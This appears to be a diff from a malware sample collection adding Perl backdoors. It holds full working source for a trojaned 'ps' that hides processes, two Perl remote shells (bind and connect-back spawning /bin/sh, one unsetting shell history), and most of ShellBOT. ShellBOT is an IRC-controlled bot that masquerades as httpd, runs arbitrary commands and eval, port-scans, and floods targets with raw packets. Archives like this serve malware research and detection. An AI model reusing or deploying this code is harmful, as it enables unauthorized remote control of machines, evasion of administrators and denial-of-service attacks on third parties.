my ($link,$file_print) = @_;
my $host = $link;
my $host_dir = $host;
my @links;
$host_dir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host_dir=&End($host_dir);
$host=&End($host);
$link=&End($host);
push(@links,$link,$host,$host_dir);
open($file,'>>',$file_print);
print $file "$link\n$host_dir\n$host\n";
close($file);
return @links;
}
sub End(){
$stringa=$_[0];
$stringa.="/";
$stringa=~s/\/\//\//;
while($stringa=~/\/\//){
$stringa=~s/\/\//\//;
}
return($stringa);
}
sub Unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ ){
next if $visti{ $elemento }++;
push @unici, $elemento;
}
return @unici;
}
sub Agent(){
my @ret = (
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",
"Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
"Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",
"Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
"Microsoft Pocket Internet Explorer/0.6",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",
"MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)",
"Advanced Browser (http://www.avantbrowser.com)",
"Avant Browser (http://www.avantbrowser.com)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",
"Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
"Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
"Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
"Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",
"Mozilla/3.0 (OS/2; U)",
"Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",
"Mozilla/4.61 (Macintosh; I; PPC)",
"Mozilla/4.61 [en] (OS/2; U)",
"Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",
"Mozilla/4.8 [en] (Windows NT 5.0; U)" );
return(@ret);
}
sub GoogleDomains(){
my @dom = ("at","ch","de","fr","gr","nl","pt","co.uk","be");
return(@dom);
}

2114
Perl/Backdoor.Perl.IRCBot.y Normal file
View File

File diff suppressed because one or more lines are too long

2116
Perl/Backdoor.Perl.IRCBot.z Normal file
View File

File diff suppressed because it is too large Load Diff

40
Perl/Backdoor.Perl.Psesb Normal file
View File

@ -0,0 +1,40 @@
#
# lame tiny easy to use backdoor for ps
#
# the word placed after filterword= will be filtered out of the output of ps
#
# usage:
# # mv /bin/ps /bin/.ps
# # cp ~/psbackdoor.sh /bin/ps
# # chmod a+x /bin/ps
#
# Thats it, have phun scriptkiddies
# The Itch / Bse / g0tr00t
# http://bse.die.ms
# http://www.g0tr00t.net
filterword="su"
originalps=/bin/.ps
tempfile=/tmp/.pstmp
grep=/bin/grep
numlines=0
touch $tempfile
if [ ! -x $originalps ]; then
echo "Error: original ps not found!";
exit 1
fi
if [ ! -w $tempfile ]; then
echo "Error: tempfile handling failed!";
exit 1
fi
$originalps $1 $2 $3 $4| $grep -v $filterword > $tempfile
numlines=`cat $tempfile|wc -l`
numlines=`expr $numlines - 2`
head -n $numlines $tempfile
rm -rf $tempfile

130
Perl/Backdoor.Perl.RShell.a Normal file
View File

@ -0,0 +1,130 @@
#
# Asmodeus v0.1
# Perl Remote Shell
# by phuket
# www.smoking-gnu.org
#
# (Server is based on some code found on [url=http://www.governmentsecurity.org)]www.governmentsecurity.org)[/url]
#
# perl asmodeus.pl client 6666 127.0.0.1
# perl asmodeus.pl server 6666
#
use Socket;
$cs=$ARGV[0];
$port=$ARGV[1];
$host=$ARGV[2];
if ($cs eq 'client') {&client}
elsif ($cs eq 'server') {&server}
sub client{
socket(TO_SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$internet_addr = inet_aton("$host") or die "ALOA:$!\n";
$paddr=sockaddr_in("$port", $internet_addr);
connect(TO_SERVER, $paddr) or die "$port:$internet_addr:$!\n";
open(STDIN, ">&TO_SERVER");
open(STDOUT, ">&TO_SERVER");
open(STDERR, ">&TO_SERVER");
print "Asmodeus Perl Remote Shell\n";
system(date);
system("/bin/sh");
close(TO_SERVER);
}
sub server{
$proto=getprotobyname('tcp');
$0="asm";
$system='/bin/sh';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
print "Asmodeus Perl Remote Shell\n";
system(date);
system("/bin/sh");
close(STDIN);
close(STDOUT);
close(STDERR);
return;
}
}

60
Perl/Backdoor.Perl.RShell.b Normal file
View File

@ -0,0 +1,60 @@
use IO::Socket;
#WwW.CoM Security Hackers
#coded bY: MasterKid
#We Are: MasterKid, AleXutz, FatMan & MiKuTuL
#Email: muzicteam2006@yahoo.com
#
#kid@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#kid@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

2578
Perl/Backdoor.Perl.Shellbot.B.txt Normal file
View File

File diff suppressed because it is too large Load Diff

665
Perl/Backdoor.Perl.Shellbot.a Normal file
View File

@ -0,0 +1,665 @@
#
# ShellBOT - Atrix Team
#
# 0ldW0lf - oldwolf@atrix-team.org
# - www.atrix-team.org
# - www.atrix.cjb.net
#
# modificado por poerschke
# irc.gigachat.net #spykids
#
################ CONFIGURACAO #################################################################
my $processo = "/hsphere/shared/apache/bin/httpd -DSSL"; # Nome do processo que vai aparece no ps #
#----------------------------------------------################################################
my $linas_max="10"; # Evita o flood :) depois de X linhas #
#----------------------------------------------################################################
my $sleep="4"; # ele dorme X segundos #
##################### IRC #####################################################################
@adms=("poerschke","_CaKe_"); # Nick do administrador #
#----------------------------------------------################################################
my @canais=("#perl"); # Caso haja senha ("#canal :senha") #
#----------------------------------------------################################################
my $nick="spykids"; # Nick do bot. Caso esteja em uso vai aparecer #
# aparecer com numero radonamico no final #
#----------------------------------------------################################################
my $ircname = "rox"; # User ID #
#----------------------------------------------################################################
chop (my $realname = `uname -a`); # Full Name #
#----------------------------------------------################################################
$servidor="irc.gigachat.net" unless $servidor; # Servidor de irc que vai ser usado #
# caso não seja especificado no argumento #
#----------------------------------------------################################################
my $porta="6667"; # Porta do servidor de irc #
################ ACESSO A SHELL ###############################################################
my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
###############################################################################################
my $VERSAO = "0.2";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
#############################
# B0tchZ na veia ehehe :P #
#############################
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == "1") {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{"host"} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{"porta"} = "$porta_con";
$irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
$irc_servers{$IRC_cur_socket}{"meuip"} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{""}) if (defined($irc_servers{""}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{"nick"};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp="";
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION ShellBOT-$VERSAO por 0ldW0lf\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!atrix)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!atrix" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
$irc_servers{$IRC_cur_socket}{"nome"} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=( 44464, 4444, 14589, 666, 6666, 6968, 26092, 530, 46256, 31337,
2222, 3879, 30464, 40193, 36864, 33270, 36864, 40193, 30464,
8008, 1234, 6969, 7788, 1524, 10000, 12321, 43690, 3333,
9999, 8975, 16705, 2313, 21317, 36864, 13330, 58821, 6682, 5678,
45295, 65535, 26112, 7512, 24876, 9191, 5321, 50766, 1492, 12345,
12346, 6969, 6970, 12666, 1666, 80, 21, 23, 25, 110, 5252, 9988,
41254, 5074, 139, 44123);
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => "tcp", Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada");
}
}
if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} + $pacotes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Média de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^entrar (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
DCC::SEND("$1", "$2");
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
return unless $secv;
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "Diertório inexistente!");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
sub attacker {
my $iaddr = inet_aton($_[0]);
my $msg = "B" x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65535; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
# DoS ?? :P
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
#############
# ALIASES #
#############
sub action {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub hop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub dehop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MODE $_[0] -v $_[1]");
}
sub ban {
return unless $#_ == 1;
sendraw("MODE $_[0] +b $_[1]");
}
sub unban {
return unless $#_ == 1;
sendraw("MODE $_[0] -b $_[1]");
}
sub kick {
return unless $#_ == 1;
sendraw("KICK $_[0] $_[1] :$_[2]");
}
sub modo {
return unless $#_ == 0;
sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub j { &entrar(@_); }
sub entrar {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub whois {
return unless $#_ == 0;
sendraw("WHOIS $_[0]");
}
sub who {
return unless $#_ == 0;
sendraw("WHO $_[0]");
}
sub names {
return unless $#_ == 0;
sendraw("NAMES $_[0]");
}
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
sub quit {
sendraw("QUIT :$_[0]");
}
# DCC
package DCC;
sub connections {
my @ready = $dcc_sel->can_read(1);
# return unless (@ready);
foreach my $fh (@ready) {
my $dcctipo = $DCC{$fh}{tipo};
my $arquivo = $DCC{$fh}{arquivo};
my $bytes = $DCC{$fh}{bytes};
my $cur_byte = $DCC{$fh}{curbyte};
my $nick = $DCC{$fh}{nick};
my $msg;
my $nread = sysread($fh, $msg, 10240);
if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
$DCC{$fh}{status} = "Cancelado";
$DCC{$fh}{ftime} = time;
$dcc_sel->remove($fh);
$fh->close;
next;
}
if ($dcctipo eq "get") {
$DCC{$fh}{curbyte} += length($msg);
my $cur_byte = $DCC{$fh}{curbyte};
open(FILE, ">> $arquivo");
print FILE "$msg" if ($cur_byte <= $bytes);
close(FILE);
my $packbyte = pack("N", $cur_byte);
print $fh "$packbyte";
if ($bytes == $cur_byte) {
$dcc_sel->remove($fh);
$fh->close;
$DCC{$fh}{status} = "Recebido";
$DCC{$fh}{ftime} = time;
next;
}
} elsif ($dcctipo eq "send") {
my $send = $fh->accept;
$send->autoflush(1);
$dcc_sel->add($send);
$dcc_sel->remove($fh);
$DCC{$send}{tipo} = "sendcon";
$DCC{$send}{itime} = time;
$DCC{$send}{nick} = $nick;
$DCC{$send}{bytes} = $bytes;
$DCC{$send}{curbyte} = 0;
$DCC{$send}{arquivo} = $arquivo;
$DCC{$send}{ip} = $send->peerhost;
$DCC{$send}{porta} = $send->peerport;
$DCC{$send}{status} = "Enviando";
#de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
open(FILE, "< $arquivo");
my $fbytes;
read(FILE, $fbytes, 1024);
print $send "$fbytes";
close FILE;
# delete($DCC{$fh});
} elsif ($dcctipo eq "sendcon") {
my $bytes_sended = unpack("N", $msg);
$DCC{$fh}{curbyte} = $bytes_sended;
if ($bytes_sended == $bytes) {
$fh->close;
$dcc_sel->remove($fh);
$DCC{$fh}{status} = "Enviado";
$DCC{$fh}{ftime} = time;
next;
}
open(SENDFILE, "< $arquivo");
seek(SENDFILE, $bytes_sended, 0);
my $send_bytes;
read(SENDFILE, $send_bytes, 1024);
print $fh "$send_bytes";
close(SENDFILE);
}
}
}
sub SEND {
my ($nick, $arquivo) = @_;
unless (-r "$arquivo") {
return(0);
}
my $dccark = $arquivo;
$dccark =~ s/[.*\/](\S+)/$1/;
my $meuip = $::irc_servers{"$::IRC_cur_socket"}{"meuip"};
my $longip = unpack("N",inet_aton($meuip));
my @filestat = stat($arquivo);
my $size_total=$filestat[7];
if ($size_total == 0) {
return(0);
}
my ($porta, $sendsock);
do {
$porta = int rand(64511);
$porta += 1024;
$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => "tcp") and $dcc_sel->add($sendsock);
} until $sendsock;
$DCC{$sendsock}{tipo} = "send";
$DCC{$sendsock}{nick} = $nick;
$DCC{$sendsock}{bytes} = $size_total;
$DCC{$sendsock}{arquivo} = $arquivo;
&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
}
sub GET {
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
return(0) if (-e "$arquivo");
if (open(FILE, "> $arquivo")) {
close FILE;
} else {
return(0);
}
my $dccip=fixaddr($dcclongip);
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
$dccsock->autoflush(1);
$dcc_sel->add($dccsock);
$DCC{$dccsock}{tipo} = "get";
$DCC{$dccsock}{itime} = time;
$DCC{$dccsock}{nick} = $nick;
$DCC{$dccsock}{bytes} = $bytes;
$DCC{$dccsock}{curbyte} = 0;
$DCC{$dccsock}{arquivo} = $arquivo;
$DCC{$dccsock}{ip} = $dccip;
$DCC{$dccsock}{porta} = $dccporta;
$DCC{$dccsock}{status} = "Recebendo";
}
# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
sub Status {
my $socket = shift;
my $sock_tipo = $DCC{$socket}{tipo};
unless (lc($sock_tipo) eq "chat") {
my $nick = $DCC{$socket}{nick};
my $arquivo = $DCC{$socket}{arquivo};
my $itime = $DCC{$socket}{itime};
my $ftime = time;
my $status = $DCC{$socket}{status};
$ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
my $d_time = $ftime-$itime;
my $cur_byte = $DCC{$socket}{curbyte};
my $bytes_total = $DCC{$socket}{bytes};
my $rate = 0;
$rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
my $porcen = ($cur_byte*100)/$bytes_total;
my ($r_duv, $p_duv);
if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
$r_duv = $3; $r_duv++ if $4 >= 5;
$rate = "$1\.$2"."$r_duv";
}
if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
$p_duv = $3; $p_duv++ if $4 >= 5;
$porcen = "$1\.$2"."$p_duv";
}
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
}
return(0);
}
# esse "sub fixaddr" daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
sub fixaddr {
my ($address) = @_;
chomp $address; # just in case, sigh.
if ($address =~ /^\d+$/) {
return inet_ntoa(pack "N", $address);
} elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
return $address;
